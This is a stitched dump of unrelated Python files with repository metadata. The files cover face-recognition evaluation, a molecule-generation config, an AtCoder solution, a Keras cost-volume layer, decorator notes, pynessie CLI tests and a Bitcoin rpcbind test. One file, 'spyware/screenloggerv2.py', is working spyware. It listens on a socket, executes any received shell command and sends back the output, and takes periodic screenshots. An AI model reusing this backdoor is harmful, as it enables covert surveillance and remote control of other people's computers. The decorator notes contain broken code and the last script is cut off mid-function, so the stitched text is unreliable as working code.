# _arg["softmax_label"] = _label.as_in_context(_ctx)
# for k,v in _arg.iteritems():
# print(k,v.context)
# exe = sym.bind(_ctx, _arg ,args_grad=None, grad_req="null", aux_states=_aux)
# exe.forward(is_train=False)
# net_out = exe.outputs
_embeddings = net_out[0].asnumpy()
# print(_embeddings.shape)
if embeddings is None:
embeddings = np.zeros((lfw_data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
# print(_em.shape, _norm)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
_, _, accuracy, val, val_std, far = evaluate(embeddings, issame_list, nrof_folds=10)
acc1, std1 = np.mean(accuracy), np.std(accuracy)
# print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' % (val, val_std, far))
# embeddings = np.concatenate(embeddings_list, axis=1)
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
_, _, accuracy, val, val_std, far = evaluate(embeddings, issame_list, nrof_folds=10)
acc2, std2 = np.mean(accuracy), np.std(accuracy)
return acc1, std1, acc2, std2, _xnorm, embeddings_list
| 42.295139
| 117
| 0.628684
|
02d683bb77fcf3d544db0af5d4d5b22ba318e5ac
| 9,098
|
py
|
Python
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | 1
|
2022-02-22T02:06:10.000Z
|
2022-02-22T02:06:10.000Z
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | 12
|
2022-02-21T12:59:24.000Z
|
2022-02-22T12:25:49.000Z
|
src/gt4sd/algorithms/conditional_generation/paccmann_rl/core.py
|
hhhsu0825/gt4sd-core
|
4a1fe9da58d2f33bba2fba64604427e037ad7a46
|
[
"MIT"
] | null | null | null |
"""PaccMann\\ :superscript:`RL` Algorithm.
PaccMann\\ :superscript:`RL` generation is conditioned via reinforcement learning.
"""
import logging
from dataclasses import field
from typing import Any, Callable, ClassVar, Dict, Iterable, Optional, TypeVar
from typing_extensions import Protocol, runtime_checkable
from ....domains.materials import Omics, Protein, SmallMolecule
from ....exceptions import InvalidItem
from ...core import AlgorithmConfiguration, GeneratorAlgorithm
from ...registry import ApplicationsRegistry
from .implementation import (
ConditionalGenerator,
ProteinSequenceConditionalGenerator,
TranscriptomicConditionalGenerator,
)
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
T = TypeVar("T", Protein, Omics)
S = TypeVar("S", bound=SmallMolecule)
Targeted = Callable[[T], Iterable[Any]]
class PaccMannRL(GeneratorAlgorithm[S, T]):
"""PaccMann\\ :superscript:`RL` Algorithm."""
def __init__(
self,
configuration: AlgorithmConfiguration[S, T],
target: Optional[T],
):
"""Instantiate PaccMannRL ready to generate items.
Args:
configuration: domain and application
specification defining parameters, types and validations.
target: a target for which to generate items.
Example:
An example for generating small molecules (SMILES) with high affinity
for a target protein::
affinity_config = PaccMannRLProteinBasedGenerator()
target = "MVLSPADKTNVKAAWGKVGAHAGEYGAEALERMFLSFPTT"
paccmann_affinity = PaccMannRL(configuration=affinity_config, target=target)
items = list(paccmann_affinity.sample(10))
print(items)
"""
configuration = self.validate_configuration(configuration)
# TODO there might also be a validation/check on the target input
super().__init__(
configuration=configuration, # type:ignore
target=target, # type:ignore
)
def get_generator(
self,
configuration: AlgorithmConfiguration[S, T],
target: Optional[T],
) -> Targeted[T]:
"""Get the function to sample batches via PaccMannRL's ConditionalGenerator.
Args:
configuration: helps to set up specific application of PaccMannRL.
target: context or condition for the generation.
Returns:
callable with target generating a batch of items.
"""
logger.info("ensure artifacts for the application are present.")
self.local_artifacts = configuration.ensure_artifacts()
implementation: ConditionalGenerator = configuration.get_conditional_generator( # type: ignore
self.local_artifacts
)
return implementation.generate_batch
def validate_configuration(
self, configuration: AlgorithmConfiguration[S, T]
) -> AlgorithmConfiguration[S, T]:
@runtime_checkable
class AnyPaccMannRLConfiguration(Protocol):
"""Protocol for PaccMannRL configurations."""
def get_conditional_generator(
self, resources_path: str
) -> ConditionalGenerator:
...
def validate_item(self, item: Any) -> S:
...
# TODO raise InvalidAlgorithmConfiguration
assert isinstance(configuration, AnyPaccMannRLConfiguration)
assert isinstance(configuration, AlgorithmConfiguration)
return configuration
@ApplicationsRegistry.register_algorithm_application(PaccMannRL)
class PaccMannRLProteinBasedGenerator(AlgorithmConfiguration[SmallMolecule, Protein]):
"""
Configuration to generate compounds with high affinity to a target protein.
Implementation from the paper: https://doi.org/10.1088/2632-2153/abe808.
"""
algorithm_type: ClassVar[str] = "conditional_generation"
domain: ClassVar[str] = "materials"
algorithm_version: str = "v0"
batch_size: int = field(
default=32,
metadata=dict(description="Batch size used for the generative model sampling."),
)
temperature: float = field(
default=1.4,
metadata=dict(
description="Temperature parameter for the softmax sampling in decoding."
),
)
generated_length: int = field(
default=100,
metadata=dict(
description="Maximum length in tokens of the generated molcules (relates to the SMILES length)."
),
)
def get_target_description(self) -> Dict[str, str]:
"""Get description of the target for generation.
Returns:
target description.
"""
return {
"title": "Target protein sequence",
"description": "AA sequence of the protein target to generate non-toxic ligands against.",
"type": "string",
}
def get_conditional_generator(
self, resources_path: str
) -> ProteinSequenceConditionalGenerator:
"""Instantiate the actual generator implementation.
Args:
resources_path: local path to model files.
Returns:
instance with :meth:`generate_batch<gt4sd.algorithms.conditional_generation.paccmann_rl.implementation.ConditionalGenerator.generate_batch>` method for targeted generation.
"""
return ProteinSequenceConditionalGenerator(
resources_path=resources_path,
temperature=self.temperature,
generated_length=self.generated_length,
samples_per_protein=self.batch_size,
)
def validate_item(self, item: str) -> SmallMolecule:
"""Check that item is a valid SMILES.
Args:
item: a generated item that is possibly not valid.
Raises:
InvalidItem: in case the item can not be validated.
Returns:
the validated SMILES.
"""
(
molecules,
_,
) = ProteinSequenceConditionalGenerator.validate_molecules([item])
if molecules[0] is None:
raise InvalidItem(
title="InvalidSMILES",
detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"',
)
return SmallMolecule(item)
@ApplicationsRegistry.register_algorithm_application(PaccMannRL)
class PaccMannRLOmicBasedGenerator(AlgorithmConfiguration[SmallMolecule, Omics]):
"""
Configuration to generate compounds with low IC50 for a target omics profile.
Implementation from the paper: https://doi.org/10.1016/j.isci.2021.102269.
"""
algorithm_type: ClassVar[str] = "conditional_generation"
domain: ClassVar[str] = "materials"
algorithm_version: str = "v0"
batch_size: int = field(
default=32,
metadata=dict(description="Batch size used for the generative model sampling."),
)
temperature: float = field(
default=1.4,
metadata=dict(
description="Temperature parameter for the softmax sampling in decoding."
),
)
generated_length: int = field(
default=100,
metadata=dict(
description="Maximum length in tokens of the generated molcules (relates to the SMILES length)."
),
)
def get_target_description(self) -> Dict[str, str]:
"""Get description of the target for generation.
Returns:
target description.
"""
return {
"title": "Gene expression profile",
"description": "A gene expression profile to generate effective molecules against.",
"type": "list",
}
def get_conditional_generator(
self, resources_path: str
) -> TranscriptomicConditionalGenerator:
"""Instantiate the actual generator implementation.
Args:
resources_path: local path to model files.
Returns:
instance with :meth:`generate_batch<gt4sd.algorithms.conditional_generation.paccmann_rl.implementation.ConditionalGenerator.generate_batch>` method for targeted generation.
"""
return TranscriptomicConditionalGenerator(
resources_path=resources_path,
temperature=self.temperature,
generated_length=self.generated_length,
samples_per_profile=self.batch_size,
)
def validate_item(self, item: str) -> SmallMolecule:
"""Check that item is a valid SMILES.
Args:
item: a generated item that is possibly not valid.
Raises:
InvalidItem: in case the item can not be validated.
Returns:
the validated SMILES.
"""
(
molecules,
_,
) = TranscriptomicConditionalGenerator.validate_molecules([item])
if molecules[0] is None:
raise InvalidItem(
title="InvalidSMILES",
detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"',
)
return SmallMolecule(item)
| 33.696296
| 184
| 0.647725
|
370e849fb95c18bce260bb8c2811cb9a62936083
| 1,659
|
py
|
Python
|
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
spyware/screenloggerv2.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
#-*-coding: utf-8-*-
from socket import *
from os import popen, getcwd, chdir
from getpass import getuser
from pyautogui import screenshot
from threading import *
from datetime import date
from time import sleep
class Bd():
def __init__(self, ip = "127.0.0.1", port = 5000):
sock = socket(AF_INET, SOCK_STREAM)
sock.bind(("127.0.0.1", 5000))
sock.listen(1)
self.conn, addr = sock.accept()
t = int()
d = "C:\\Users\\{}\\Pictures\\".format(getuser())
self.check = False
while True:
cmd = self.conn.recv(1024).decode()
if cmd[:2] == "cd":
try:
chdir(cmd[3:])
except:
pass
finally:
self.conn.send("{}".format(getcwd()).encode())
elif cmd == "sass":
self.check = True
f = Thread(target=self.photo,args=(t, d,))
f.daemon = True
f.start()
elif cmd[:6] == "setdir":
try:
d = cmd[7:]
except Exception as e:
self.conn.send("{}".format(e).encode())
else:
self.conn.send("Variable declarada correctamente.".encode())
elif cmd[:7] =="settime":
try:
t = int(cmd[8:])
except Exception as e:
self.conn.send("{}".format(e).encode())
else:
self.conn.send("Variable declarada correctamente".encode())
elif cmd == "stopss":
self.check = False
else:
out = popen(cmd).read()
self.conn.send(out.encode())
def photo(self, time, dr):
chdir(dr)
count = 1
while True:
if self.check == False:
self.conn.send("Se han detenido las capturas de pantalla.".encode())
break
ss = screenshot()
ss.save("{}-{}.png".format(date.today(),count))
count += 1
sleep(time)
if __name__ == '__main__':
main = Bd()
| 21.828947
| 72
| 0.601567
|
c3a95581e9831f5cb6554c1ce51f783811b1f71a
| 364
|
py
|
Python
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | 2
|
2020-06-12T09:54:23.000Z
|
2021-05-04T01:34:07.000Z
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | 961
|
2020-06-23T07:26:22.000Z
|
2022-03-31T21:34:52.000Z
|
ARC/arc101-arc150/arc109/b/main.py
|
KATO-Hiro/AtCoder
|
cbbdb18e95110b604728a54aed83a6ed6b993fde
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
def main():
import sys
input = sys.stdin.readline
n = int(input())
low = 1
high = n + 1
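    # Binary search for the largest `low` satisfying low * (low + 1) / 2 <= n + 1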
while (high - low) > 1:
mid = (high + low) // 2
if mid * (mid + 1) <= 2 * (n + 1):
low = mid
else:
high = mid
print(n - low + 1)
if __name__ == "__main__":
main()
| 14
| 42
| 0.414835
|
58af8afeb8e652ae0b0280d30b9f2e511c87650b
| 980
|
py
|
Python
|
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | 5
|
2018-05-18T22:13:36.000Z
|
2019-05-07T10:04:34.000Z
|
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | null | null | null |
src/cost_volume.py
|
hmarechal/gcnet_stereo
|
80f681ec6a52638c38f039d6117ee9475e55d7db
|
[
"MIT"
] | 5
|
2018-04-02T09:00:34.000Z
|
2018-11-23T14:34:45.000Z
|
from keras import backend as K
# from keras.layers.core import Lambda
# from keras.layers.core import Reshape
def _concat_features(lf, states):
b,f,h,w = lf.get_shape().as_list()
rf = states[0]
rfs = rf[:, :, :, :-1]
disp_rfs = K.spatial_2d_padding(rfs, padding=((0, 0), (1, 0)), data_format='channels_first')
concat = K.concatenate([lf, rf], axis=2)
output = K.reshape(concat, (-1, 2*f, h, w))
return output, [disp_rfs]
def cost_volume(inputs, dmax):
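    # Pair the left feature map with the right feature map shifted by 0..dmax-1 columns
    # (one K.rnn step per disparity), yielding a cost volume of shape
    # (batch, 2*features, dmax, height, width) after the final permute.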
left_feature = inputs[0]
right_feature = inputs[1]
left_feature = K.expand_dims(left_feature, axis=1)
left_feature = K.repeat_elements(left_feature, dmax, axis=1)
l,o,n = K.rnn(_concat_features, inputs=left_feature, initial_states=[right_feature], unroll=True)
return K.permute_dimensions(o, (0, 2, 1, 3, 4))
# class CostVolumeBuilder():
# @classmethod
# def get_layer(cls, D):
# return Lambda(cost_volume, arguments = {'d':D/2})
| 36.296296
| 102
| 0.64898
|
584ca853b2bfa3bd9fae0c8d96e74d7354882492
| 2,958
|
py
|
Python
|
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
my_classes/ScopesClosuresAndDecorators/.history/Decoraators2_20210716232429.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
""" Decorator Parametors
In the previous ideos we saw some built-in decorators that can handle some arguments:
@wraps(fn) @lru_cache(maxsize=256) <\
def inner(): def factorial(n): \
... ... \>function call
This should look quite differient grom the decorators we have been creating and using:
@timed <----------- no function call
def Fibonacci(n):
...
"""
from time import perf_counter
def timed(fn):
    from time import perf_counter
    def inner(*args, **kwargs):
        total_elapsed = 0
        for i in range(10): # hardcoded value 10 # need to pass as a parameter
            start = perf_counter()
            result = fn(*args, **kwargs)
            total_elapsed += (perf_counter() - start)
        avg_elapsed = total_elapsed / 10
        print(avg_elapsed)
        return result
    return inner
"""
@timed
def my_func(): or my_func = timed(my_func)
...
On e Approach to passing (line 24) as a parameter
/ < extra parameter
def timed(fn, reps):
from time import perf_counter
def inner(*args, **kwargs):
total_elapsed = 0 / free variable
for i in range(reps): <
start = perf_counter()
result = fn(*ars, **kwargs)
total_elapsed += (perf_counter() - start)
avg_elapsed = total_elapsed / reps
print(avg_elapsed)
return result
return inner
my_func = timed(my_func, 10)
# Rethinking the solution
@timed
def my_func(): my_func = timed solution(my_func)
...
So, timed is a function that returns that inner closure that contains our original function
In order for this to work as intended:
@timed(10)
def my_func():
...
dec = timed(10) # will need to return our original timed decorator when called
dec = timed(10) # timed(10) returns a decorator
@dec
def my_func():
...
# Nested closures to the rescue!
def timed(fn): # Timed is basically a decorator == it only takes a single parameter
from time import perf_counter
def inner(*args, **kwargs):
total_elapsed = 0 / free variable bound to reps in outer
for i in range(reps): <
start = perf_counter()
result = fn(*ars, **kwargs)
total_elapsed += (perf_counter() - start)
avg_elapsed = total_elapsed / reps
print(avg_elapsed)
return result
return inner
return timed # cslling outer(n) returns our originsl decorator withrepd det to n (free variable)
my_func = outer(10)(my_func) or @outer(10)
def my_func():
...
# Decorator Factories
The outer function is not itseld a decorator
"""
| 25.282051
| 103
| 0.576065
|
880b13e328ec7a153cb10072b8dd9fe017c14a72
| 8,584
|
py
|
Python
|
python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `pynessie` package."""
import itertools
import os
from pathlib import Path
from typing import List
from typing import Optional
import confuse
import pytest
import simplejson
from click.testing import CliRunner
from click.testing import Result
from pynessie import __version__
from pynessie import cli
from pynessie.model import Branch
from pynessie.model import ContentsSchema
from pynessie.model import EntrySchema
from pynessie.model import IcebergTable
from pynessie.model import ReferenceSchema
def _run(runner: CliRunner, args: List[str], input: Optional[str] = None, ret_val: int = 0) -> Result:
result = runner.invoke(cli.cli, args, input=input)
assert result.exit_code == ret_val
return result
@pytest.mark.vcr
def test_command_line_interface() -> None:
"""Test the CLI."""
runner = CliRunner()
result = _run(runner, list())
assert "Usage: cli" in result.output
help_result = _run(runner, ["--help"])
assert "Usage: cli" in help_result.output
help_result = _run(runner, ["--version"])
assert __version__ in help_result.output
help_result = _run(runner, ["--json", "branch", "-l"])
references = ReferenceSchema().loads(help_result.output, many=True)
assert len(references) == 1
assert references[0].name == "main"
assert isinstance(references[0], Branch)
assert references[0].hash_ == "2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d"
def test_config_options() -> None:
"""Ensure config cli option is consistent."""
runner = CliRunner()
result = _run(runner, ["config"])
assert "Usage: cli" in result.output
vars = ["--add x", "--get x", "--list", "--unset x"]
for i in itertools.permutations(vars, 2):
result = _run(runner, ["config"] + [*i[0].split(" "), *i[1].split(" ")], ret_val=2)
assert "Error: Illegal usage: " in result.output
_run(runner, ["config", "x", "--add", "x"])
def test_set_unset() -> None:
"""Test config set/unset/list."""
runner = CliRunner()
_run(runner, ["config", "--add", "test.data", "123", "--type", "int"])
result = _run(runner, ["config", "test.data", "--type", "int"])
assert result.output == "123\n"
_run(runner, ["config", "--unset", "test.data"])
result = _run(runner, ["config", "--list"])
assert "123" not in result.output
@pytest.mark.vcr
def test_remote() -> None:
"""Test setting and viewing remote."""
runner = CliRunner()
_run(runner, ["remote", "add", "http://test.url"])
_run(runner, ["remote", "add", "http://localhost:19120/api/v1"])
result = _run(runner, ["--json", "remote", "show"])
assert "main" in result.output
_run(runner, ["remote", "set-head", "dev"])
result = _run(runner, ["config", "default_branch"])
assert result.output == "dev\n"
_run(runner, ["remote", "set-head", "dev", "-d"])
result = _run(runner, ["config", "default_branch"], ret_val=1)
assert result.output == ""
assert isinstance(result.exception, confuse.exceptions.ConfigTypeError)
_run(runner, ["remote", "set-head", "main"])
@pytest.mark.vcr
def test_log() -> None:
"""Test log and log filtering."""
runner = CliRunner()
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 0
_run(
runner,
[
"contents",
"--set",
"foo.bar",
"--ref",
"main",
"-m",
"test_message",
"-c",
"2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d",
],
input=ContentsSchema().dumps(IcebergTable("/a/b/c")),
)
result = _run(runner, ["--json", "contents", "foo.bar"])
tables = ContentsSchema().loads(result.output, many=True)
assert len(tables) == 1
assert tables[0] == IcebergTable("/a/b/c")
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 1
result = _run(runner, ["--json", "log", logs[0]["hash"]])
logs = simplejson.loads(result.output)
assert len(logs) == 1
result = _run(runner, ["--json", "contents", "--list"])
entries = EntrySchema().loads(result.output, many=True)
assert len(entries) == 1
_run(runner, ["--json", "contents", "--delete", "foo.bar", "--ref", "main", "-m", "delete_message", "-c", logs[0]["hash"]])
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 2
result = _run(runner, ["--json", "log", "{}..{}".format(logs[0]["hash"], logs[1]["hash"])])
logs = simplejson.loads(result.output)
assert len(logs) == 1
@pytest.mark.vcr
def test_ref() -> None:
"""Test create and assign refs."""
runner = CliRunner()
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
_run(runner, ["branch", "dev"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 2
_run(runner, ["branch", "etl", "main"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 3
_run(runner, ["branch", "-d", "etl"])
_run(runner, ["branch", "-d", "dev"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
@pytest.mark.vcr
def test_tag() -> None:
"""Test create and assign refs."""
runner = CliRunner()
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 0
_run(runner, ["tag", "dev", "main"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
_run(runner, ["tag", "etl", "main"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 2
_run(runner, ["tag", "-d", "etl"])
_run(runner, ["tag", "-d", "dev"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 0
_run(runner, ["tag", "v1.0"], ret_val=1)
@pytest.mark.vcr
def test_assign() -> None:
"""Test assign operation."""
runner = CliRunner()
_run(runner, ["branch", "dev"])
_run(
runner,
[
"contents",
"--set",
"foo.bar",
"--ref",
"dev",
"-m",
"test_message",
"-c",
"2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d",
],
input=ContentsSchema().dumps(IcebergTable("/a/b/c")),
)
_run(runner, ["branch", "main", "dev", "--force"])
result = _run(runner, ["--json", "branch"])
branches = ReferenceSchema().loads(result.output, many=True)
refs = {i.name: i.hash_ for i in branches}
assert refs["main"] == refs["dev"]
_run(runner, ["tag", "v1.0", "main"])
result = _run(runner, ["--json", "tag"])
tags = {i.name: i.hash_ for i in ReferenceSchema().loads(result.output, many=True)}
assert tags["v1.0"] == refs["main"]
_run(runner, ["tag", "v1.0", "dev", "--force"])
result = _run(runner, ["--json", "tag"])
tags = {i.name: i.hash_ for i in ReferenceSchema().loads(result.output, many=True)}
assert tags["v1.0"] == refs["dev"]
_run(runner, ["branch", "dev", "--delete"])
_run(runner, ["tag", "v1.0", "--delete"])
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
_run(runner, ["--json", "contents", "--delete", "foo.bar", "--ref", "main", "-m", "delete_message", "-c", logs[0]["hash"]])
@pytest.mark.doc
def test_all_help_options() -> None:
"""Write out all help options to std out."""
runner = CliRunner()
args = ["", "config", "branch", "tag", "remote", "log", "merge", "cherry-pick", "contents"]
for i in args:
result = _run(runner, [x for x in [i] if x] + ["--help"])
cwd = os.getcwd()
with open(Path(Path(cwd), "docs", "{}.rst".format(i if i else "main")), "w") as f:
f.write(".. code-block:: bash\n\n\t")
for line in result.output.split("\n"):
f.write(line + "\n\t")
f.write("\n\n")
| 36.683761
| 127
| 0.597274
|
178389d5858a94260cabec9a1b2e7e8ebbba8488
| 5,574
|
py
|
Python
|
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Test for -rpcbind, as well as -rpcallowip and -rpcconnect
# TODO extend this test from the test framework (like all other tests)
import tempfile
import traceback
from test_framework.util import *
from test_framework.netutil import *
def run_bind_test(tmpdir, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
nodes = start_nodes(1, tmpdir, [base_args + binds], connect_to)
try:
pid = shiabitd_processes[0].pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
finally:
stop_nodes(nodes)
wait_shiabitds()
def run_allowip_test(tmpdir, allow_ips, rpchost, rpcport):
'''
Start a node with rpcwallow IP, and request getinfo
at a non-localhost IP.
'''
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
nodes = start_nodes(1, tmpdir, [base_args])
try:
# connect to node through non-loopback interface
url = "http://rt:rt@%s:%d" % (rpchost, rpcport,)
node = get_rpc_proxy(url, 1)
node.getinfo()
finally:
node = None # make sure connection will be garbage collected and closed
stop_nodes(nodes)
wait_shiabitds()
def run_test(tmpdir):
assert(sys.platform == 'linux2') # due to OS-specific network stats queries, this test works only on Linux
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
assert(not 'This test requires at least one non-loopback IPv4 interface')
print("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
run_bind_test(tmpdir, None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
run_bind_test(tmpdir, ['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
run_bind_test(tmpdir, [non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
run_allowip_test(tmpdir, [non_loopback_ip], non_loopback_ip, defaultport)
try:
run_allowip_test(tmpdir, ['1.1.1.1'], non_loopback_ip, defaultport)
assert(not 'Connection not denied by rpcallowip as expected')
except ValueError:
pass
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave shiabitds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing shiabitd/shiabit-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
run_test(options.tmpdir)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
wait_shiabitds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| 37.662162
| 110
| 0.640653
|
0c38f70383286f3b0e6acc05acd2389d156cdf4d
| 3,286
|
py
|
Python
|
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import flashalgorithm as fc
import numpy as np
import pickle
import pdb
comp_list = ('water', 'methane', 'ethane', 'propane')
phase_list = ('aqueous', 'vapor', 'lhc', 's1', 's2')
P = 70 # bar
T = 273.15 + 6 # Kelvin
flash_full = fc.FlashController(components=comp_list,
phases=phase_list)
water_fracs = [0.4, 0.6, 0.92, 0.96]
hc_fracs = np.linspace(0, 1, 30)
c1_frac, c2_frac, c3_frac = np.meshgrid(hc_fracs, hc_fracs, hc_fracs)
z_all = list()
for water in water_fracs:
for hcs in zip(c1_frac.flatten(), c2_frac.flatten(), c3_frac.flatten()):
if sum(hcs) > 0.0:
mod_hcs = [x / sum(hcs) * (1.0 - water) for x in hcs]
z = np.asarray([water] + mod_hcs)
z_all.append(z / np.sum(z))
z_use = np.unique(np.asarray(z_all), axis=0)
def emptycomp_hash(z):
